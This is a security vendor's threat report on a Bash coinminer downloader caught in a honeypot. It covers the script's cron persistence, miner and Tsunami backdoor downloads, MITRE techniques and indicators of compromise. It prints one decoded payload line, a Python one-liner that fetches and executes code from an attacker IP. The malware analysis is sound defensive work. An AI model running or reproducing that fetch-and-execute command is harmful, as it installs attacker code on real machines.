Coinminer Downloader Threat Report

Coinminer Downloader

Threat Report

Date: 08 /09 /2020

Hussain Kathawala

Coinminer Downloader is a shell agent that downloads BTC coinminer which belongs to the malware category that exploits resources. It might give access to the victim’s machine to use the computer’s resources and mine digital currency.

OVERVIEW

• The Malware file of this Coinminer Downloader was intercepted by the Subex Honeypot on 29th August 2020. • The downloader script has been written in Bash. • The Coinminer has various variants in form of executables. It might be distributed through malicious email attachments, self-executing scripts, malicious software, etc. • Through the Coinminer, the attacker uses the victim system’s resources such as Graphics Processing Unit to generate digital currency without the system owner’s consent, leading to decrease in performance of the system.

PAYLOAD AND INFECTION

Starting with “ulimit” command, the bot allocates maximum number of processes to a single user. Next it fake multiplies the actual core of the victim system’s processor by 3 and assigns the value to the variable “vm.nr_hugepages” using “sysctl” command, after it kills all the services running on the list of ports as shown in figure 1.

Figure 1

It stores the range of victim IP address in “range” variable filtering with “ifconfig” command.

After getting the range of the victim IP address the bot sends a ping to the “pool.supportxmr.com” server. If the condition returns “1”, it indicates that the server is up and it moves towards further execution.

Figure 2 Then, it sets up the payload. While analysing the payload, a base64 encoded string is obtained after decoding which, we further obtain a python command (seen below) which is used to read the python file present in the ip “205.185.113.151”. python -c 'import urllib;exec(urllib.urlopen("http://205.185.113.151/d.py").read())'

Figure 3

Next, the bot changes the attribute of crontab files with the help of “chattr” command and makes the entries of the same payload that should execute at different time intervals and defines them in different crontab files as shown in below figure.

Figure 4

The bot then defines “DIR” variable having path of “tmp” directory, moves to the location "/tmp/.sh" and checks the existence of the file “x86_64”.If it is present it calculates the md5 of the file and matches it with the md5 of Coinminer ELF malware “cd7ca50a01fc9c6e8fdc8c3d5e6100f0”. If the md5 matches, it shows the message “x86_64 ok” else, it moves towards the “download()” function.

Figure 5

The bot, then, again checks for the existence of the file “x86_643” in the “/tmp” directory having the md5 “cd7ca50a01fc9c6e8fdc8c3d5e6100f0” of Coinminer. If the file is present it makes a copy of “x86_643” with the name “x86_64”, in the “download()” function, If it is not present, it executes the “download2()” function. In “download2()” it first checks the architecture and it downloads the file according to the architecture in the same location i.e. “tmp” directory. After downloading the malware file it verifies md5 checksum as shown in the figure.

Figure 6

Then, the bot, changes the mode of the malware file and gives the execute permission as shown in figure.

Figure 7

After the execution of Coinminer, the bot checks the netstat connection to IP “104.244.75.25”. If the connection has been established, the bot downloads additional malware file (based on architecture) by calculating the md5 of it. The additional malware file belongs to “Backdoor Tsunami” malware having md5 = “c4d44eed4916675dd408ff0b3562fb1f” and execute it after giving execution permission as shown in figure.

Figure 8 After running the bash script from the terminal, the output would be as shown below. It shows all the process which has been executed by the bot that we have discussed earlier.

Figure 9

As we can also see, a crontab entry of the same payload is made and set such that it should be executed every minute.

Figure 10

NETWORK TRAFFIC ANALYSIS

While analysing the network traffic, the Coinminer Elf is downloaded from the IP “209.141.61.233” as shown in below figure.

Figure 11

The Coinminer communication is done on the C&C server having IP “209.151.39.17” as shown in the figure.

Figure 12

MITRE ATT&CK TECHNIQUES USED

Technique ID Technique T1059.004 Command and Scripting Interpreter: Unix Shell T1053.003 Scheduled Task/Job: Cron T1083 File and Directory Discovery T1132.001 Data Encoding: Standard Encoding T1496 Resource Hijacking

IOC’s

e2c6e2b1a5625bfc5c7d018029f022aa cd7ca50a01fc9c6e8fdc8c3d5e6100f0 c4d44eed4916675dd408ff0b3562fb1f 205.185.113.151 104.244.75.25 209.141.61.233 209.151.39.17 pool.supportxmr.com

SUBEXSECURE PROTECTION

SubexSecure detects the sample as “SS_Gen_Coinminer_Downloader_Shell_A”.

OUR HONEYPOT NETWORK

This report has been prepared from threat intelligence gathered by our honeypot network that is today operational in 62 cities across the world. These cities have at least one of these attributes:

▪ Are landing centers for submarine cables ▪ Are internet traffic hotspots ▪ House multiple IoT projects with a high number of connected endpoints ▪ House multiple connected critical infrastructure projects ▪ Have academic and research centers focusing on IoT ▪ Have the potential to host multiple IoT projects across domains in the future

Over 3.5 million attacks a day registered across this network of individual honeypots are studied, analyzed, categorized and marked according to a threat rank index, a priority assessment framework that we have developed within Subex. The network includes over 4000 physical and virtual devices covering over 400 device architectures and varied connectivity flavors globally. Devices are grouped based on the sectors they belong to for purposes of understanding sectoral attacks. Thus, a layered flow of threat intelligence is made possible.